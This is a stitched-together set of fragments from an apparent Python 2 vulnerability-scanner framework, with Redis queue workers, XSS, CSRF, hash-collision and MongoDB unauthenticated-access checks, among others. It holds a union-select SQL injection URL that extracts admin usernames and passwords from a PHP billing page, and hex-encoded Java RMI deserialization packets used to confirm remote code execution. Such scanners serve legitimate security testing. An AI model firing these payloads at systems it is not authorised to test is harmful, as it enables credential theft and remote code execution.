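def check():
    """Consume queued scan targets from Redis and run every scanner on each.

    Pops one item per iteration from the ``data`` list on the module-level
    Redis client ``r``.  Each item is expected to be a JSON document; it is
    decoded, passed through ``byteify`` and then handed, in turn, to the
    SQLi, XSS, CSRF and hash-collision scanners through ``main``.  When the
    queue is empty the loop sleeps 10 seconds before polling again.

    Never returns; intended to run as a long-lived worker process.
    """
    while True:
        data = r.lpop('data')
        if not data:
            # Queue drained: back off before polling again.
            time.sleep(10)
            continue

        print("[ ------------- CHECK DATA ------------- ]")
        try:
            jsonData = byteify(json.loads(data))
        except ValueError as e:
            # A malformed queue entry must not take the whole worker down.
            # It has already been popped, so report it and move on.
            print("[ SKIPPING UNPARSEABLE DATA: {0} ]".format(e))
            continue

        # Each scanner is a plugin object; ``main`` drives it to completion.
        print("CHECKING SQLI")
        main(SqliScan(jsonData))
        print("CHECKING XSS")
        main(XssScan(jsonData))
        print("CHECKING CSRF")
        main(CsrfScan(jsonData))
        print("CHECKING HASHCOLLISISON")
        main(HashcollisionScan(jsonData))
        print("[ ------------- WAITING NEXT ------------- ]")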
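def check():
    """Run the scanners once over every item currently in the Redis queue.

    Reads the whole ``data`` list from the module-level Redis client ``r``
    without removing anything (``lrange``, not ``lpop``), so repeated calls
    re-scan the same entries.  Each truthy item is decoded as JSON, passed
    through ``byteify`` and handed to the XSS, CSRF and hash-collision
    scanners through ``main``; the SQLi scanner is not run in this variant.
    A falsy item triggers a 10 second sleep before the next one is read.
    """
    datas = r.lrange('data', 0, -1)
    for data in datas:
        if not data:
            time.sleep(10)
            continue

        print("[ ------------- CHECK DATA ------------- ]")
        try:
            jsonData = byteify(json.loads(data))
        except ValueError as e:
            # Skip a malformed entry instead of aborting the whole pass.
            print("[ SKIPPING UNPARSEABLE DATA: {0} ]".format(e))
            continue

        # NOTE: the SQLi scanner (SqliScan) is deliberately left out here.
        print("CHECKING XSS")
        main(XssScan(jsonData))
        print("CHECKING CSRF")
        main(CsrfScan(jsonData))
        print("CHECKING HASHCOLLISISON")
        main(HashcollisionScan(jsonData))
        print("[ ------------- WAITING NEXT ------------- ]")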
            },
            "description": "",
            "error": "",
        })

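    def verify(self):
        """Test whether the target MongoDB accepts a client without credentials.

        Opens a ``pymongo.MongoClient`` against ``self.option.host`` /
        ``self.option.port`` with no credentials and asks for the list of
        database names.  If that call succeeds the deployment lets an
        unauthenticated client enumerate databases: ``self.result.status``
        is set to True and the names are recorded in
        ``self.result.data.db_info.db_name`` and ``self.result.description``.
        Any exception (connection refused, timeout, server rejecting the
        call, ...) is turned into ``self.result.error`` and the method
        returns.  The client is closed in every case.
        """
        host = self.option.host
        port = self.option.port

        conn = None
        try:
            conn = pymongo.MongoClient(host=host, port=port)
            db_names = conn.database_names()
        except Exception as e:
            # Report the failure in the result rather than re-raising.
            self.result.error = "连接发生错误: {error}".format(error=str(e))
            return
        finally:
            # Release the connection pool regardless of outcome; the
            # original never closed the client.
            if conn is not None:
                conn.close()

        self.result.status = True
        self.result.data.db_info.db_name = str(db_names)
        self.result.description = "目标 {host} 的 mongodb 可以未授权访问, 数据库名: {db_names}".format(
            host=self.option.host,
            db_names=str(db_names)
        )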

    def exploit(self):
        """Exploit stage of the plugin.

        Delegates entirely to ``verify``; this plugin has no separate
        exploitation step beyond the verification itself.
        """
        return self.verify()


if __name__ == '__main__':
    from modules.main import main
    main(TangScan())
            "{domain}/php/bill/list_userinfo.php?domain=fatezero.org&ok=1&cp=1 union select concat(0x7e7e7e,"
            "oid,0x7c7c7c,password,0x7e7e7e),2,3,4,5 from admininfo%23".format(
                domain=self.option.url))

        try:
            response = requests.get(exp_url,
                                    cookies=cookies,
                                    timeout=15,
                                    verify=False)
        except Exception, e:
            self.result.error = str(e)
            return

        re_result = re_userinfo_pattern.findall(response.content)
        if len(re_result) == 0:
            self.result.status = False
            return

        self.result.status = True
        self.result.data.user_info.username = re_result[0][0]
        self.result.data.user_info.password = re_result[0][1]
        self.result.description = "目标 {url} 存在sql注入, 目标管理员用户: {username}, 密码: {password}".format(
            url=self.option.url,
            username=self.result.data.user_info.username,
            password=self.result.data.user_info.password)


if __name__ == '__main__':
    # Standalone entry point: the shared plugin runner is imported here,
    # not at module top, so the import only happens when this file is run
    # directly.
    from modules.main import main
    main(TangScan())
                                             javajsondata) - 2.3 * trantime

            IfExist = False
            for name in times:
                if times[name] > limit:
                    print "Probably have HashCollision==>",
                    payload = "TYPE : " + name + " SERVER RUNNING TIME : " + str(
                        times[name])
                    self.payloads.append(payload)
                    IfExist = True
            return IfExist
        except:
            print "-------------connect error-------------"
            return False

    def result(self):
        """Attack-type stage of the plugin.

        Not implemented here; returns None.
        """
        return None


if __name__ == '__main__':
    # Standalone entry point; the shared runner is imported lazily here.
    from modules.main import main
    # NOTE(review): the runner is invoked five times in a row.  It is not
    # clear from this file whether the repetition is intentional (e.g. to
    # repeat a timing measurement) or a paste error -- confirm.
    main(HashcollisionScan())
    main(HashcollisionScan())
    main(HashcollisionScan())
    main(HashcollisionScan())
    main(HashcollisionScan())
                if "Payload" in row:
                    payload = row.split(": ")[1]
                    self.payloads.append(payload)
                if "Parameter:" in row:
                    prepara = row.split(": ")[1]
                    #prepare如 "#1* (URI)"
                    if "URI" in prepara:
                        # prepare由此截取出一个数字
                        prepara = prepara.split("#")[1].split("*")[0]
                        para = URI[int(prepara) - 1] + "(GET)"
                        #print chardet.detect(URI[int(prepara)-1])
                    elif "POST" in prepara:
                        prepara = prepara.split("#")[1].split("*")[0]
                        para = POST[int(prepara) - 1] + "(POST)"
                    self.paras.append(para)

            return True
            #file_data="success: [",vul_time,"] url:",url," payload:",payload," cookie:",cookie,"","\n"

    def result(self):
        """Attack-type stage of the plugin.

        Not implemented here; returns None.
        """
        return None


if __name__ == '__main__':
    # Standalone entry point: the shared plugin runner is imported here,
    # not at module top, so the import only happens when this file is run
    # directly.
    from modules.main import main
    main(SqliScan())
                                             time.localtime(time.time()))

                    if 'Success' in stdout:
                        self.payloads.append(scanurl)
                        self.paras.append(psbkey)
                        break

    def changePara(self, para):
        """Serialise a dict of parameters as a raw ``key=value&key=value`` string.

        Keys and values are concatenated as-is: nothing is URL-encoded (the
        commented-out ``urllib.quote`` variant is not used), so the caller is
        responsible for any escaping.  Pairs appear in the dict's iteration
        order; an empty dict yields ``""``.
        """
        pairs = [name + "=" + para[name] for name in para]
        return "&".join(pairs)

    def result(self):
        """Attack-type stage of the plugin.

        Not implemented here; returns None.
        """
        return None


if __name__ == '__main__':
    # Standalone entry point: the shared plugin runner is imported here,
    # not at module top, so the import only happens when this file is run
    # directly.
    from modules.main import main
    main(XssScan())
        except:
            ##print "无COOKIE ————————————————"
            cookie = ""
        #print cookie
        csrf = csrfCheck()
        forms = csrf.check(url, cookie)
        #print forms
        if len(forms) == 0:
            return False
        else:
            #print url
            for form in forms:
                #self.plugin_info["target"] += "  --  表单:"
                payload = re.findall("<form[\s\S]*?>", form)[0]
                self.payloads.append(payload)
            return True
            #csrf.show(result)

    def result(self):
        """Attack-type stage of the plugin.

        Not implemented here; returns None.
        """
        return None


if __name__ == '__main__':
    # Standalone entry point: the shared plugin runner is imported here,
    # not at module top, so the import only happens when this file is run
    # directly.
    from modules.main import main
    main(CsrfScan())
#coding:utf-8
import redis
import json
from csrf import CsrfScan
from sqli import SqliScan
from modules.main import main
from xss import XssScan
import time

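r = redis.Redis(host='127.0.0.1', port=6379, db=0)

# One-shot pass over the most recent queue entry only (lrange -1 -1); no
# polling loop is implemented in this script.
datas = r.lrange('data', -1, -1)

for data in datas:
    if not data:
        print("NO DATA")
        continue

    try:
        jsonData = json.loads(data)
    except ValueError as e:
        # A malformed entry used to abort the script; report it and move on.
        print("[ JSON ERROR: {0} ]".format(e))
        continue

    # The dict handed to the plugin may lack keys such as 'cookie'; the
    # plugin must check for a key before indexing, or data['cookie'] raises.
    exist = main(XssScan(jsonData))
    if exist:
        # The original had this string as a bare expression statement, which
        # is a no-op; it is now actually printed.
        print("[ 检测出存在漏洞 ]")
    else:
        print("不存在")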
            "severity": self.level.high,  # 漏洞等级
            "privileged": False,  # 是否需要登录
            "target": self.target  #漏洞目标
        }

    def match(self):
        """Decide whether this plugin should run against the current target.

        Always applies: every target is accepted.
        """
        applies = True
        return applies

    def check(self):
        """Verification stage, meant to avoid triggering WAF rules.

        Not implemented here; returns None.
        """
        return None

    def result(self):
        """Attack-type stage of the plugin.

        Not implemented here; returns None.
        """
        return None


if __name__ == '__main__':
    # Standalone entry point: the shared plugin runner is imported here,
    # not at module top, so the import only happens when this file is run
    # directly.
    from modules.main import main
    main(MeScan())
#!/usr/bin/env python
# coding:utf-8
# author:ZhaoHu

import os
import sys

# Put the directory two levels above this file on the import path so that
# ``modules`` resolves no matter which working directory the script is
# launched from.
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from modules import main

if __name__ == '__main__':
    # Entry point: hand off to the shared runner.
    main.main()
                               "b70016bf00010000002b002b0010000200240000001e0007000000130008001400100015002b0018002c001a0039" \
                               "001c003b001f00270000000c00026b07002ffc000f070030002b000000040001001000090031003200020023000" \
                               "000220001000100000006121db8001eb10000000100240000000a00020000002600050027002b00000004000100" \
                               "100001003300000002003474000577726974657571007e001d000000017671007e002e737200116a6176612e757" \
                               "4696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c" \
                               "647078703f4000000000000c7708000000100000000174000576616c756571007e003578787672001b6a6176612" \
                               "e6c616e672e616e6e6f746174696f6e2e5461726765740000000000000000000000707870"
            send_data_first = binascii.a2b_hex(send_packet_first)
            send_data_second = binascii.a2b_hex(send_packet_second)
            sock.send(send_data_first)
            recv_packet = sock.recv(1024)
            ip = recv_packet[3:-4]
            time.sleep(1)
            sock.send(send_data_second)
            packet = sock.recv(1024)
            packet = sock.recv(1024)
            if ip in packet:
                self.result.status = True
                self.result.data.infos = '存在 Java RMI 反序列化代码执行'
        except:
            print "请检查源码"

    def exploit(self):
        """Exploit stage of the plugin.

        Only prints a debug line when ``self.result.exp_status`` is truthy;
        nothing else is done and no state is modified.
        """
        if not self.result.exp_status:
            return
        print(" debug test")


if __name__ == '__main__':
    # Standalone entry point: the shared plugin runner is imported here,
    # not at module top, so the import only happens when this file is run
    # directly.
    from modules.main import main
    main(PLScan())